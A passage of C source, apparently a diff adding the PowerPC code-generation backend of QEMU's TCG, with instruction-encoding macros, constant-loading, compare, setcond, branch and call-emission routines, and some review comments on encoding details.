MULHDU XO31( 9) +#define DIVD XO31(489) +#define DIVDU XO31(457) + +#define LBZX XO31( 87) +#define LHZX XO31(279) +#define LHAX XO31(343) +#define LWZX XO31( 23) +#define STBX XO31(215) +#define STHX XO31(407) +#define STWX XO31(151) + +#define SPR(a, b) ((((a)<<5)|(b))<<11) +#define LR SPR(8, 0) +#define CTR SPR(9, 0) + +#define SLW XO31( 24) +#define SRW XO31(536) +#define SRAW XO31(792) + +#define SLD XO31( 27) +#define SRD XO31(539) +#define SRAD XO31(794) +#define SRADI XO31(413<<1) + +#define TW XO31( 4) +#define TRAP (TW | TO(31)) + +#define NOP ORI /* ori 0,0,0 */ + +#define RT(r) ((r)<<21) +#define RS(r) ((r)<<21) +#define RA(r) ((r)<<16) +#define RB(r) ((r)<<11) +#define TO(t) ((t)<<21) +#define SH(s) ((s)<<11) +#define MB(b) ((b)<<6) +#define ME(e) ((e)<<1) +#define BO(o) ((o)<<21) +#define MB64(b) ((b)<<5) +#define FXM(b) (1 << (19 - (b))) + +#define LK 1 + +#define TAB(t, a, b) (RT(t) | RA(a) | RB(b)) +#define SAB(s, a, b) (RS(s) | RA(a) | 
RB(b)) +#define TAI(s, a, i) (RT(s) | RA(a) | ((i) & 0xffff)) +#define SAI(s, a, i) (RS(s) | RA(a) | ((i) & 0xffff)) + +#define BF(n) ((n)<<23) +#define BI(n, c) (((c)+((n)*4))<<16) +#define BT(n, c) (((c)+((n)*4))<<21) +#define BA(n, c) (((c)+((n)*4))<<16) +#define BB(n, c) (((c)+((n)*4))<<11) +#define BC_(n, c) (((c)+((n)*4))<<6) + +#define BO_COND_TRUE BO(12) +#define BO_COND_FALSE BO( 4) +#define BO_ALWAYS BO(20) + +enum { + CR_LT, + CR_GT, + CR_EQ, + CR_SO +}; + +static const uint32_t tcg_to_bc[] = { + [TCG_COND_EQ] = BC | BI(7, CR_EQ) | BO_COND_TRUE, + [TCG_COND_NE] = BC | BI(7, CR_EQ) | BO_COND_FALSE, + [TCG_COND_LT] = BC | BI(7, CR_LT) | BO_COND_TRUE, + [TCG_COND_GE] = BC | BI(7, CR_LT) | BO_COND_FALSE, + [TCG_COND_LE] = BC | BI(7, CR_GT) | BO_COND_FALSE, + [TCG_COND_GT] = BC | BI(7, CR_GT) | BO_COND_TRUE, + [TCG_COND_LTU] = BC | BI(7, CR_LT) | BO_COND_TRUE, + [TCG_COND_GEU] = BC | BI(7, CR_LT) | BO_COND_FALSE, + [TCG_COND_LEU] = BC | BI(7, CR_GT) | BO_COND_FALSE, + [TCG_COND_GTU] = BC | BI(7, CR_GT) | BO_COND_TRUE, +}; + +/* The low bit here is set if the RA and RB fields must be inverted. 
*/ +static const uint32_t tcg_to_isel[] = { + [TCG_COND_EQ] = ISEL | BC_(7, CR_EQ), + [TCG_COND_NE] = ISEL | BC_(7, CR_EQ) | 1, + [TCG_COND_LT] = ISEL | BC_(7, CR_LT), + [TCG_COND_GE] = ISEL | BC_(7, CR_LT) | 1, + [TCG_COND_LE] = ISEL | BC_(7, CR_GT) | 1, + [TCG_COND_GT] = ISEL | BC_(7, CR_GT), + [TCG_COND_LTU] = ISEL | BC_(7, CR_LT), + [TCG_COND_GEU] = ISEL | BC_(7, CR_LT) | 1, + [TCG_COND_LEU] = ISEL | BC_(7, CR_GT) | 1, + [TCG_COND_GTU] = ISEL | BC_(7, CR_GT), +}; + +static void tcg_out_mem_long(TCGContext *s, int opi, int opx, TCGReg rt, + TCGReg base, tcg_target_long offset); + +static void tcg_out_mov(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg) +{ + tcg_debug_assert(TCG_TARGET_REG_BITS == 64 || type == TCG_TYPE_I32); + if (ret != arg) { + tcg_out32(s, OR | SAB(arg, ret, arg)); + } +} + +static inline void tcg_out_rld(TCGContext *s, int op, TCGReg ra, TCGReg rs, + int sh, int mb) +{ + assert(TCG_TARGET_REG_BITS == 64); + sh = SH(sh & 0x1f) | (((sh >> 5) & 1) << 1); + mb = MB64((mb >> 5) | ((mb << 1) & 0x3f)); + tcg_out32(s, op | RA(ra) | RS(rs) | sh | mb); +} + +static inline void tcg_out_rlw(TCGContext *s, int op, TCGReg ra, TCGReg rs, + int sh, int mb, int me) +{ + tcg_out32(s, op | RA(ra) | RS(rs) | SH(sh) | MB(mb) | ME(me)); +} + +static inline void tcg_out_ext32u(TCGContext *s, TCGReg dst, TCGReg src) +{ + tcg_out_rld(s, RLDICL, dst, src, 0, 32); +} + +static inline void tcg_out_shli32(TCGContext *s, TCGReg dst, TCGReg src, int c) +{ + tcg_out_rlw(s, RLWINM, dst, src, c, 0, 31 - c); +} + +static inline void tcg_out_shli64(TCGContext *s, TCGReg dst, TCGReg src, int c) +{ + tcg_out_rld(s, RLDICR, dst, src, c, 63 - c); +} + +static inline void tcg_out_shri32(TCGContext *s, TCGReg dst, TCGReg src, int c) +{ + tcg_out_rlw(s, RLWINM, dst, src, 32 - c, c, 31); +} + +static inline void tcg_out_shri64(TCGContext *s, TCGReg dst, TCGReg src, int c) +{ + tcg_out_rld(s, RLDICL, dst, src, 64 - c, c); +} + +static void tcg_out_movi32(TCGContext *s, TCGReg ret, 
/* NOTE(review): continuation of tcg_out_movi32 — the signature line lies above
   this chunk.  Emits a 32-bit constant load: a single ADDI when the value fits
   in 16 signed bits, otherwise ADDIS of the high half plus ORI of the low.  */
int32_t arg)
{
    if (arg == (int16_t) arg) {
        tcg_out32(s, ADDI | TAI(ret, 0, arg));
    } else {
        tcg_out32(s, ADDIS | TAI(ret, 0, arg >> 16));
        if (arg & 0xffff) {
            tcg_out32(s, ORI | SAI(ret, ret, arg));
        }
    }
}

/* Load the constant ARG into register RET using the shortest insn sequence
   available for TYPE (I32 or sign-extended-32 values take the 32-bit path).  */
static void tcg_out_movi(TCGContext *s, TCGType type, TCGReg ret,
                         tcg_target_long arg)
{
    tcg_debug_assert(TCG_TARGET_REG_BITS == 64 || type == TCG_TYPE_I32);
    if (type == TCG_TYPE_I32 || arg == (int32_t)arg) {
        tcg_out_movi32(s, ret, arg);
    } else if (arg == (uint32_t)arg && !(arg & 0x8000)) {
        /* Zero-extended 32-bit constant whose bit 15 is clear: ADDI will not
           sign-extend garbage into the high half, so ADDI+ORIS suffices.  */
        tcg_out32(s, ADDI | TAI(ret, 0, arg));
        tcg_out32(s, ORIS | SAI(ret, ret, arg >> 16));
    } else {
        int32_t high;

        if (USE_REG_RA) {
            /* Try materializing the value relative to the return-address
               register when the displacement fits in 32 bits.  */
            intptr_t diff = arg - (intptr_t)tb_ret_addr;
            if (diff == (int32_t)diff) {
                tcg_out_mem_long(s, ADDI, ADD, ret, TCG_REG_RA, diff);
                return;
            }
        }

        /* General 64-bit case: build the high 32 bits, shift into place,
           then OR in the two low 16-bit halves as needed.  */
        high = arg >> 31 >> 1;
        tcg_out_movi32(s, ret, high);
        if (high) {
            tcg_out_shli64(s, ret, ret, 32);
        }
        if (arg & 0xffff0000) {
            tcg_out32(s, ORIS | SAI(ret, ret, arg >> 16));
        }
        if (arg & 0xffff) {
            tcg_out32(s, ORI | SAI(ret, ret, arg));
        }
    }
}

/* Return true if C is a (possibly wrapped) contiguous run of 1 bits usable
   as an rlwinm mask, storing the mask-begin/mask-end bit numbers.  */
static bool mask_operand(uint32_t c, int *mb, int *me)
{
    uint32_t lsb, test;

    /* Accept a bit pattern like:
        0....01....1
        1....10....0
        0..01..10..0
       Keep track of the transitions.  */
    if (c == 0 || c == -1) {
        /* NOTE(review): c is uint32_t; the -1 compare relies on the usual
           arithmetic conversion to 0xffffffff — intentional here.  */
        return false;
    }
    test = c;
    lsb = test & -test;
    test += lsb;
    if (test & (test - 1)) {
        return false;
    }

    *me = clz32(lsb);
    *mb = test ? clz32(test & -test) + 1 : 0;
    return true;
}

/* 64-bit variant: only non-wrapping runs (1..10..0 or 0..01..1) are
   representable by a single RLDICR/RLDICL clear.  */
static bool mask64_operand(uint64_t c, int *mb, int *me)
{
    uint64_t lsb;

    if (c == 0) {
        return false;
    }

    lsb = c & -c;
    /* Accept 1..10..0.  */
    if (c == -lsb) {
        *mb = 0;
        *me = clz64(lsb);
        return true;
    }
    /* Accept 0..01..1.  */
    if (lsb == 1 && (c & (c + 1)) == 0) {
        *mb = clz64(c + 1) + 1;
        *me = 63;
        return true;
    }
    return false;
}

/* AND of SRC with 32-bit constant C into DST: immediate forms first,
   then a rotate-and-mask, else via a scratch constant in R0.  */
static void tcg_out_andi32(TCGContext *s, TCGReg dst, TCGReg src, uint32_t c)
{
    int mb, me;

    if ((c & 0xffff) == c) {
        tcg_out32(s, ANDI | SAI(src, dst, c));
        return;
    } else if ((c & 0xffff0000) == c) {
        tcg_out32(s, ANDIS | SAI(src, dst, c >> 16));
        return;
    } else if (mask_operand(c, &mb, &me)) {
        tcg_out_rlw(s, RLWINM, dst, src, 0, mb, me);
    } else {
        tcg_out_movi(s, TCG_TYPE_I32, TCG_REG_R0, c);
        tcg_out32(s, AND | SAB(src, dst, TCG_REG_R0));
    }
}

/* 64-bit AND with constant: same strategy using the RLDIC* forms.  */
static void tcg_out_andi64(TCGContext *s, TCGReg dst, TCGReg src, uint64_t c)
{
    int mb, me;

    assert(TCG_TARGET_REG_BITS == 64);
    if ((c & 0xffff) == c) {
        tcg_out32(s, ANDI | SAI(src, dst, c));
        return;
    } else if ((c & 0xffff0000) == c) {
        tcg_out32(s, ANDIS | SAI(src, dst, c >> 16));
        return;
    } else if (mask64_operand(c, &mb, &me)) {
        if (mb == 0) {
            tcg_out_rld(s, RLDICR, dst, src, 0, me);
        } else {
            tcg_out_rld(s, RLDICL, dst, src, 0, mb);
        }
    } else {
        tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_R0, c);
        tcg_out32(s, AND | SAB(src, dst, TCG_REG_R0));
    }
}

/* Shared body for OR/XOR with a 32-bit immediate: emit the hi/lo 16-bit
   immediate forms as needed (zero halves are skipped entirely).  */
static void tcg_out_zori32(TCGContext *s, TCGReg dst, TCGReg src, uint32_t c,
                           int op_lo, int op_hi)
{
    if (c >> 16) {
        tcg_out32(s, op_hi | SAI(src, dst, c >> 16));
        src = dst;
    }
    if (c & 0xffff) {
        tcg_out32(s, op_lo | SAI(src, dst, c));
        src = dst;
    }
}

static void tcg_out_ori32(TCGContext *s, TCGReg dst, TCGReg src, uint32_t c)
{
    tcg_out_zori32(s, dst, src, c, ORI, ORIS);
}

static void tcg_out_xori32(TCGContext *s, TCGReg dst, TCGReg src, uint32_t c)
{
    tcg_out_zori32(s, dst, src, c, XORI, XORIS);
}

/* Emit a branch to TARGET: direct B if the displacement fits in 26 bits,
   otherwise load the address and branch via CTR.  MASK carries LK/AA bits.  */
static void tcg_out_b(TCGContext *s, int mask, tcg_insn_unit *target)
{
    ptrdiff_t disp = tcg_pcrel_diff(s, target);
    if (in_range_b(disp)) {
        tcg_out32(s, B | (disp & 0x3fffffc) | mask);
    } else {
        tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R0, (uintptr_t)target);
        tcg_out32(s, MTSPR | RS(TCG_REG_R0) | CTR);
        tcg_out32(s, BCCTR | BO_ALWAYS | mask);
    }
}

/* Emit a load/store with an arbitrary offset, picking between the D-form
   (OPI, 16-bit displacement) and X-form (OPX, indexed) encodings.  ALIGN
   marks DS-form ops (LD/LWA/STD) whose low 2 offset bits must be clear.  */
static void tcg_out_mem_long(TCGContext *s, int opi, int opx, TCGReg rt,
                             TCGReg base, tcg_target_long offset)
{
    tcg_target_long orig = offset, l0, l1, extra = 0, align = 0;
    bool is_store = false;
    TCGReg rs = TCG_REG_TMP1;

    switch (opi) {
    case LD: case LWA:
        align = 3;
        /* FALLTHRU */
    default:
        /* For loads, the destination can double as the scratch — unless it
           is R0, which reads as literal 0 in the RA field.  */
        if (rt != TCG_REG_R0) {
            rs = rt;
            break;
        }
        break;
    case STD:
        align = 3;
        /* FALLTHRU */
    case STB: case STH: case STW:
        is_store = true;
        break;
    }

    /* For unaligned, or very large offsets, use the indexed form.  */
    if (offset & align || offset != (int32_t)offset) {
        if (rs == base) {
            rs = TCG_REG_R0;
        }
        tcg_debug_assert(!is_store || rs != rt);
        tcg_out_movi(s, TCG_TYPE_PTR, rs, orig);
        tcg_out32(s, opx | TAB(rt, base, rs));
        return;
    }

    /* Split the offset into a low 16-bit displacement and a high part
       folded into the base via ADDIS.  */
    l0 = (int16_t)offset;
    offset = (offset - l0) >> 16;
    l1 = (int16_t)offset;

    if (l1 < 0 && orig >= 0) {
        /* Avoid a negative high part for non-negative offsets by adding
           an extra 0x4000 step.  */
        extra = 0x4000;
        l1 = (int16_t)(offset - 0x4000);
    }
    if (l1) {
        tcg_out32(s, ADDIS | TAI(rs, base, l1));
        base = rs;
    }
    if (extra) {
        tcg_out32(s, ADDIS | TAI(rs, base, extra));
        base = rs;
    }
    /* Skip a wholly redundant "addi rt, rt, 0".  */
    if (opi != ADDI || base != rt || l0 != 0) {
        tcg_out32(s, opi | TAI(rt, base, l0));
    }
}

/* Typed load: LWZ/LWZX for I32, LD/LDX for I64.  */
static inline void tcg_out_ld(TCGContext *s, TCGType type, TCGReg ret,
                              TCGReg arg1, intptr_t arg2)
{
    int opi, opx;

    assert(TCG_TARGET_REG_BITS == 64 || type == TCG_TYPE_I32);
    if (type == TCG_TYPE_I32) {
        opi = LWZ, opx = LWZX;
    } else {
        opi = LD, opx = LDX;
    }
    tcg_out_mem_long(s, opi, opx, ret, arg1, arg2);
}

/* Typed store: STW/STWX for I32, STD/STDX for I64.  */
static inline void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg,
                              TCGReg arg1, intptr_t arg2)
{
    int opi, opx;

    assert(TCG_TARGET_REG_BITS == 64 || type == TCG_TYPE_I32);
    if (type == TCG_TYPE_I32) {
        opi = STW, opx = STWX;
    } else {
        opi = STD, opx = STDX;
    }
    tcg_out_mem_long(s, opi, opx, arg, arg1, arg2);
}

/* Emit a compare into condition-register field CR, choosing among the
   signed/unsigned, immediate/register CMP encodings.  (Continues below.)  */
static void tcg_out_cmp(TCGContext
*s, int cond, TCGArg arg1, TCGArg arg2,
                        int const_arg2, int cr, TCGType type)
{
    int imm;
    uint32_t op;

    tcg_debug_assert(TCG_TARGET_REG_BITS == 64 || type == TCG_TYPE_I32);

    /* Simplify the comparisons below wrt CMPI.  */
    if (type == TCG_TYPE_I32) {
        arg2 = (int32_t)arg2;
    }

    switch (cond) {
    case TCG_COND_EQ:
    case TCG_COND_NE:
        /* Equality may use either the signed or unsigned immediate form,
           whichever one the constant happens to fit.  */
        if (const_arg2) {
            if ((int16_t) arg2 == arg2) {
                op = CMPI;
                imm = 1;
                break;
            } else if ((uint16_t) arg2 == arg2) {
                op = CMPLI;
                imm = 1;
                break;
            }
        }
        op = CMPL;
        imm = 0;
        break;

    case TCG_COND_LT:
    case TCG_COND_GE:
    case TCG_COND_LE:
    case TCG_COND_GT:
        /* Signed compares: only the signed immediate form applies.  */
        if (const_arg2) {
            if ((int16_t) arg2 == arg2) {
                op = CMPI;
                imm = 1;
                break;
            }
        }
        op = CMP;
        imm = 0;
        break;

    case TCG_COND_LTU:
    case TCG_COND_GEU:
    case TCG_COND_LEU:
    case TCG_COND_GTU:
        /* Unsigned compares: only the unsigned immediate form applies.  */
        if (const_arg2) {
            if ((uint16_t) arg2 == arg2) {
                op = CMPLI;
                imm = 1;
                break;
            }
        }
        op = CMPL;
        imm = 0;
        break;

    default:
        tcg_abort();
    }
    /* Bit 21 selects the 64-bit (L=1) form of the compare.  */
    op |= BF(cr) | ((type == TCG_TYPE_I64) << 21);

    if (imm) {
        tcg_out32(s, op | RA(arg1) | (arg2 & 0xffff));
    } else {
        if (const_arg2) {
            tcg_out_movi(s, type, TCG_REG_R0, arg2);
            arg2 = TCG_REG_R0;
        }
        tcg_out32(s, op | RA(arg1) | RB(arg2));
    }
}

/* dst = (src == 0): count leading zeros, then shift the 32/64 result down
   to a 0/1 value (clz of 0 yields exactly 32 resp. 64).  */
static void tcg_out_setcond_eq0(TCGContext *s, TCGType type,
                                TCGReg dst, TCGReg src)
{
    if (type == TCG_TYPE_I32) {
        tcg_out32(s, CNTLZW | RS(src) | RA(dst));
        tcg_out_shri32(s, dst, dst, 5);
    } else {
        tcg_out32(s, CNTLZD | RS(src) | RA(dst));
        tcg_out_shri64(s, dst, dst, 6);
    }
}

/* dst = (src != 0) via the carry chain, avoiding any compare insn.  */
static void tcg_out_setcond_ne0(TCGContext *s, TCGReg dst, TCGReg src)
{
    /* X != 0 implies X + -1 generates a carry.  Extra addition
       trickery means: R = X-1 + ~X + C = X-1 + (-X+1) + C = C.  */
    if (dst != src) {
        tcg_out32(s, ADDIC | TAI(dst, src, -1));
        tcg_out32(s, SUBFE | TAB(dst, dst, src));
    } else {
        /* dst aliases src: keep the intermediate in R0.  */
        tcg_out32(s, ADDIC | TAI(TCG_REG_R0, src, -1));
        tcg_out32(s, SUBFE | TAB(dst, TCG_REG_R0, src));
    }
}

/* Reduce (arg1 cmp arg2) to (R0 cmp 0) by XOR-ing the operands into R0;
   returns the register holding the xor result (always R0).  */
static TCGReg tcg_gen_setcond_xor(TCGContext *s, TCGReg arg1, TCGArg arg2,
                                  bool const_arg2)
{
    if (const_arg2) {
        if ((uint32_t)arg2 == arg2) {
            tcg_out_xori32(s, TCG_REG_R0, arg1, arg2);
        } else {
            tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_R0, arg2);
            tcg_out32(s, XOR | SAB(arg1, TCG_REG_R0, TCG_REG_R0));
        }
    } else {
        tcg_out32(s, XOR | SAB(arg1, TCG_REG_R0, arg2));
    }
    return TCG_REG_R0;
}

/* arg0 = (arg1 cond arg2) as a 0/1 value.  */
static void tcg_out_setcond(TCGContext *s, TCGType type, TCGCond cond,
                            TCGArg arg0, TCGArg arg1, TCGArg arg2,
                            int const_arg2)
{
    int crop, sh;

    assert(TCG_TARGET_REG_BITS == 64 || type == TCG_TYPE_I32);

    /* Ignore high bits of a potential constant arg2.  */
    if (type == TCG_TYPE_I32) {
        arg2 = (uint32_t)arg2;
    }

    /* Handle common and trivial cases before handling anything else.  */
    if (arg2 == 0) {
        switch (cond) {
        case TCG_COND_EQ:
            tcg_out_setcond_eq0(s, type, arg0, arg1);
            return;
        case TCG_COND_NE:
            if (TCG_TARGET_REG_BITS == 64 && type == TCG_TYPE_I32) {
                tcg_out_ext32u(s, TCG_REG_R0, arg1);
                arg1 = TCG_REG_R0;
            }
            tcg_out_setcond_ne0(s, arg0, arg1);
            return;
        case TCG_COND_GE:
            /* GE 0 == NOT(LT 0): invert then fall into the LT case.  */
            tcg_out32(s, NOR | SAB(arg1, arg0, arg1));
            arg1 = arg0;
            /* FALLTHRU */
        case TCG_COND_LT:
            /* Extract the sign bit.  */
            if (type == TCG_TYPE_I32) {
                tcg_out_shri32(s, arg0, arg1, 31);
            } else {
                tcg_out_shri64(s, arg0, arg1, 63);
            }
            return;
        default:
            break;
        }
    }

    /* If we have ISEL, we can implement everything with 3 or 4 insns.
       All other cases below are also at least 3 insns, so speed up the
       code generator by not considering them and always using ISEL.  */
    if (HAVE_ISEL) {
        int isel, tab;

        tcg_out_cmp(s, cond, arg1, arg2, const_arg2, 7, type);

        isel = tcg_to_isel[cond];

        tcg_out_movi(s, type, arg0, 1);
        if (isel & 1) {
            /* arg0 = (bc ? 0 : 1) */
            tab = TAB(arg0, 0, arg0);
            isel &= ~1;
        } else {
            /* arg0 = (bc ? 1 : 0) */
            tcg_out_movi(s, type, TCG_REG_R0, 0);
            tab = TAB(arg0, arg0, TCG_REG_R0);
        }
        tcg_out32(s, isel | tab);
        return;
    }

    switch (cond) {
    case TCG_COND_EQ:
        arg1 = tcg_gen_setcond_xor(s, arg1, arg2, const_arg2);
        tcg_out_setcond_eq0(s, type, arg0, arg1);
        return;

    case TCG_COND_NE:
        arg1 = tcg_gen_setcond_xor(s, arg1, arg2, const_arg2);
        /* Discard the high bits only once, rather than both inputs.  */
        if (TCG_TARGET_REG_BITS == 64 && type == TCG_TYPE_I32) {
            tcg_out_ext32u(s, TCG_REG_R0, arg1);
            arg1 = TCG_REG_R0;
        }
        tcg_out_setcond_ne0(s, arg0, arg1);
        return;

    /* Remaining orders: compare into CR7, optionally combine CR bits,
       then extract the relevant bit via MFOCRF + rotate.  SH selects which
       of the LT/GT/EQ bits lands in the low position.  */
    case TCG_COND_GT:
    case TCG_COND_GTU:
        sh = 30;
        crop = 0;
        goto crtest;

    case TCG_COND_LT:
    case TCG_COND_LTU:
        sh = 29;
        crop = 0;
        goto crtest;

    case TCG_COND_GE:
    case TCG_COND_GEU:
        sh = 31;
        crop = CRNOR | BT(7, CR_EQ) | BA(7, CR_LT) | BB(7, CR_LT);
        goto crtest;

    case TCG_COND_LE:
    case TCG_COND_LEU:
        sh = 31;
        crop = CRNOR | BT(7, CR_EQ) | BA(7, CR_GT) | BB(7, CR_GT);
    crtest:
        tcg_out_cmp(s, cond, arg1, arg2, const_arg2, 7, type);
        if (crop) {
            tcg_out32(s, crop);
        }
        tcg_out32(s, MFOCRF | RT(TCG_REG_R0) | FXM(7));
        tcg_out_rlw(s, RLWINM, arg0, TCG_REG_R0, sh, 31, 31);
        break;

    default:
        tcg_abort();
    }
}

/* Emit conditional branch BC to LABEL_INDEX, or record a relocation when
   the label is not yet resolved.  */
static void tcg_out_bc(TCGContext *s, int bc, int label_index)
{
    TCGLabel *l = &s->labels[label_index];

    if (l->has_value) {
        tcg_out32(s, bc | reloc_pc14_val(s->code_ptr, l->u.value_ptr));
    } else {
        tcg_out_reloc(s, s->code_ptr, R_PPC_REL14, label_index, 0);
        tcg_out_bc_noaddr(s, bc);
    }
}

/* Compare-and-branch: compare into CR7, then branch on the condition.
   (Body continues below.)  */
static void tcg_out_brcond(TCGContext *s, TCGCond cond,
                           TCGArg arg1, TCGArg arg2, int const_arg2,
                           int label_index, TCGType type)
{
    tcg_out_cmp(s, cond, arg1, arg2, const_arg2, 7, type);
    tcg_out_bc(s, tcg_to_bc[cond], label_index);
}

/* dest = (c1 cond c2) ? v1 : v2, using ISEL when available, else a
   conditional mov guarded by a 1-insn forward branch.  */
static void tcg_out_movcond(TCGContext *s, TCGType type, TCGCond cond,
                            TCGArg dest, TCGArg c1, TCGArg c2, TCGArg v1,
                            TCGArg v2, bool const_c2)
{
    /* If for some reason both inputs are zero, don't produce bad code.  */
    if (v1 == 0 && v2 == 0) {
        tcg_out_movi(s, type, dest, 0);
        return;
    }

    tcg_out_cmp(s, cond, c1, c2, const_c2, 7, type);

    if (HAVE_ISEL) {
        int isel = tcg_to_isel[cond];

        /* Swap the V operands if the operation indicates inversion.  */
        if (isel & 1) {
            int t = v1;
            v1 = v2;
            v2 = t;
            isel &= ~1;
        }
        /* V1 == 0 is handled by isel; V2 == 0 must be handled by hand.  */
        if (v2 == 0) {
            tcg_out_movi(s, type, TCG_REG_R0, 0);
        }
        tcg_out32(s, isel | TAB(dest, v1, v2));
    } else {
        if (dest == v2) {
            cond = tcg_invert_cond(cond);
            v2 = v1;
        } else if (dest != v1) {
            if (v1 == 0) {
                tcg_out_movi(s, type, dest, 0);
            } else {
                tcg_out_mov(s, type, dest, v1);
            }
        }
        /* Branch forward over one insn */
        tcg_out32(s, tcg_to_bc[cond] | 8);
        if (v2 == 0) {
            tcg_out_movi(s, type, dest, 0);
        } else {
            tcg_out_mov(s, type, dest, v2);
        }
    }
}

/* Double-word compare for 32-bit hosts: compares the (ah:al) pair against
   (bh:bl), leaving the boolean result in CR7[EQ].  */
static void tcg_out_cmp2(TCGContext *s, const TCGArg *args,
                         const int *const_args)
{
    /* For each ordering, which CR bit of the high compare implies the
       result (bit1) and which bit of the low compare completes it (bit2). */
    static const struct { uint8_t bit1, bit2; } bits[] = {
        [TCG_COND_LT ] = { CR_LT, CR_LT },
        [TCG_COND_LE ] = { CR_LT, CR_GT },
        [TCG_COND_GT ] = { CR_GT, CR_GT },
        [TCG_COND_GE ] = { CR_GT, CR_LT },
        [TCG_COND_LTU] = { CR_LT, CR_LT },
        [TCG_COND_LEU] = { CR_LT, CR_GT },
        [TCG_COND_GTU] = { CR_GT, CR_GT },
        [TCG_COND_GEU] = { CR_GT, CR_LT },
    };

    TCGCond cond = args[4], cond2;
    TCGArg al, ah, bl, bh;
    int blconst, bhconst;
    int op, bit1, bit2;

    al = args[0];
    ah = args[1];
    bl = args[2];
    bh = args[3];
    blconst = const_args[2];
    bhconst = const_args[3];

    switch (cond) {
    case TCG_COND_EQ:
        op = CRAND;
        goto do_equality;
    case TCG_COND_NE:
        op = CRNAND;
    do_equality:
        /* Equal iff both halves are equal: combine CR6[EQ] and CR7[EQ].  */
        tcg_out_cmp(s, cond, al, bl, blconst, 6, TCG_TYPE_I32);
        tcg_out_cmp(s, cond, ah, bh, bhconst, 7, TCG_TYPE_I32);
        tcg_out32(s, op | BT(7, CR_EQ) | BA(6, CR_EQ) | BB(7, CR_EQ));
        break;

    case TCG_COND_LT:
    case TCG_COND_LE:
    case TCG_COND_GT:
    case TCG_COND_GE:
    case TCG_COND_LTU:
    case TCG_COND_LEU:
    case TCG_COND_GTU:
    case TCG_COND_GEU:
        bit1 = bits[cond].bit1;
        bit2 = bits[cond].bit2;
        op = (bit1 != bit2 ? CRANDC : CRAND);
        /* The low halves always compare unsigned.  */
        cond2 = tcg_unsigned_cond(cond);

        tcg_out_cmp(s, cond, ah, bh, bhconst, 6, TCG_TYPE_I32);
        tcg_out_cmp(s, cond2, al, bl, blconst, 7, TCG_TYPE_I32);
        /* result = (high strict) OR (high equal AND low condition).  */
        tcg_out32(s, op | BT(7, CR_EQ) | BA(6, CR_EQ) | BB(7, bit2));
        tcg_out32(s, CROR | BT(7, CR_EQ) | BA(6, bit1) | BB(7, CR_EQ));
        break;

    default:
        tcg_abort();
    }
}

/* setcond2: extract the CR7[EQ] bit computed by tcg_out_cmp2 into args[0].  */
static void tcg_out_setcond2(TCGContext *s, const TCGArg *args,
                             const int *const_args)
{
    tcg_out_cmp2(s, args + 1, const_args + 1);
    tcg_out32(s, MFOCRF | RT(TCG_REG_R0) | FXM(7));
    tcg_out_rlw(s, RLWINM, args[0], TCG_REG_R0, 31, 31, 31);
}

/* brcond2: branch on the CR7[EQ] bit computed by tcg_out_cmp2.  */
static void tcg_out_brcond2 (TCGContext *s, const TCGArg *args,
                             const int *const_args)
{
    tcg_out_cmp2(s, args, const_args);
    tcg_out_bc(s, BC | BI(7, CR_EQ) | BO_COND_TRUE, args[5]);
}

/* Patch a direct-jump site at JMP_ADDR to branch to ADDR.  A scratch
   TCGContext is pointed at the jump slot so tcg_out_b can re-encode it.  */
void ppc_tb_set_jmp_target(uintptr_t jmp_addr, uintptr_t addr)
{
    TCGContext s;

    s.code_buf = s.code_ptr = (tcg_insn_unit *)jmp_addr;
    tcg_out_b(&s, 0, (tcg_insn_unit *)addr);
    flush_icache_range(jmp_addr, jmp_addr + tcg_current_code_size(&s));
}

/* Emit an ABI-correct call to TARGET, handling the AIX function-descriptor
   and ELFv2 (r12 = entry address) conventions.  */
static void tcg_out_call(TCGContext *s, tcg_insn_unit *target)
{
#ifdef _CALL_AIX
    /* Look through the descriptor.  If the branch is in range, and we
       don't have to spend too much effort on building the toc.  */
    void *tgt = ((void **)target)[0];
    uintptr_t toc = ((uintptr_t *)target)[1];
    intptr_t diff = tcg_pcrel_diff(s, tgt);

    if (in_range_b(diff) && toc == (uint32_t)toc) {
        tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_TMP1, toc);
        tcg_out_b(s, LK, tgt);
    } else {
        /* Fold the low bits of the constant into the addresses below.  */
        intptr_t arg = (intptr_t)target;
        int ofs = (int16_t)arg;

        if (ofs + 8 < 0x8000) {
            arg -= ofs;
        } else {
            ofs = 0;
        }
        tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_TMP1, arg);
        tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_R0, TCG_REG_TMP1, ofs);
        /* NOTE(review): RA() here where every other MTSPR uses RS().  For
           mtspr CTR the SPR field occupies the RA bit positions and
           RA(TCG_REG_R0) == RS(TCG_REG_R0) == 0, so the encoding happens to
           be identical — but verify against the other call sites.  */
        tcg_out32(s, MTSPR | RA(TCG_REG_R0) | CTR);
        tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_R2, TCG_REG_TMP1, ofs + SZP);
        tcg_out32(s, BCCTR | BO_ALWAYS | LK);
    }
#elif defined(_CALL_ELF) && _CALL_ELF == 2
    intptr_t diff;

    /* In the ELFv2 ABI, we have to set up r12 to contain the destination
       address, which the callee uses to compute its TOC address.  */
    /* FIXME: when the branch is in range, we could avoid r12 load if we
       knew that the destination uses the same TOC, and what its local
       entry point offset is.  */
    tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R12, (intptr_t)target);

    diff = tcg_pcrel_diff(s, target);
    if (in_range_b(diff)) {
        tcg_out_b(s, LK, target);
    } else {
        tcg_out32(s, MTSPR | RS(TCG_REG_R12) | CTR);
        tcg_out32(s, BCCTR | BO_ALWAYS | LK);
    }
#else
    tcg_out_b(s, LK, target);
#endif
}

/* Indexed-load opcodes per TCGMemOp (size | sign | byteswap).  A zero
   entry means "no direct insn"; handled by the callers.  */
static const uint32_t qemu_ldx_opc[16] = {
    [MO_UB] = LBZX,
    [MO_UW] = LHZX,
    [MO_UL] = LWZX,
    [MO_Q]  = LDX,
    [MO_SW] = LHAX,
    [MO_SL] = LWAX,
    [MO_BSWAP | MO_UB] = LBZX,
    [MO_BSWAP | MO_UW] = LHBRX,
    [MO_BSWAP | MO_UL] = LWBRX,
    [MO_BSWAP | MO_Q]  = LDBRX,
};

/* Indexed-store opcodes per TCGMemOp.  */
static const uint32_t qemu_stx_opc[16] = {
